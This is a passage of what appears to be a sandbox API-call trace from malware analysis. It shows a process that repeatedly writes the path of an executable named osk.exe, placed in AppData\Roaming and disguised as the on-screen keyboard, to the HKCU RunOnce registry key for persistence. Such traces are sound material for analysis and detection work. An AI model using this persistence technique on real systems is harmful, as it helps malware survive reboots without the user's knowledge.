lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.643] RegCloseKey (hKey=0x280) returned 0x0 [0081.643] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.643] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.643] SetTimer (hWnd=0x20280, nIDEvent=0x20be, uElapse=0xa, lpTimerFunc=0x0) returned 0x20be [0081.643] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.656] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.656] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.656] KillTimer (hWnd=0x20280, uIDEvent=0x20be) returned 1 [0081.656] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.656] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.656] IUnknown:Release (This=0x787518) returned 0x1 [0081.657] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.657] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.657] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.657] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.657] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x43 [0081.657] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.657] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x44 [0081.657] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.658] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x43 [0081.658] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.658] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.658] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.658] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.658] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.658] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.658] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.658] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.659] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.659] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.659] RegCloseKey (hKey=0x280) returned 0x0 [0081.659] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.659] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.659] SetTimer (hWnd=0x20280, nIDEvent=0x20bf, uElapse=0xa, lpTimerFunc=0x0) returned 0x20bf [0081.659] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.672] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.672] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.672] KillTimer (hWnd=0x20280, uIDEvent=0x20bf) returned 1 [0081.672] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.672] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.672] IUnknown:Release (This=0x787518) returned 0x1 [0081.672] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.672] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.672] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.672] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.672] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.672] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.673] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.673] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.673] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.673] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x44 [0081.673] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.673] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x45 [0081.673] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.673] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x44 [0081.674] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.674] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.674] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.674] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.674] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.674] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.674] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.674] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.674] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.674] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.674] RegCloseKey (hKey=0x280) returned 0x0 [0081.674] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.674] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.674] SetTimer (hWnd=0x20280, nIDEvent=0x20c0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c0 [0081.675] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.687] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.687] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.687] KillTimer (hWnd=0x20280, uIDEvent=0x20c0) returned 1 [0081.687] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.687] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.687] IUnknown:Release (This=0x787518) returned 0x1 [0081.688] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.688] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.688] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.688] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.688] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x45 [0081.688] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.688] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x46 [0081.688] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.689] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x45 [0081.689] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.689] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.689] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.689] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.689] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.689] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.689] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.689] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 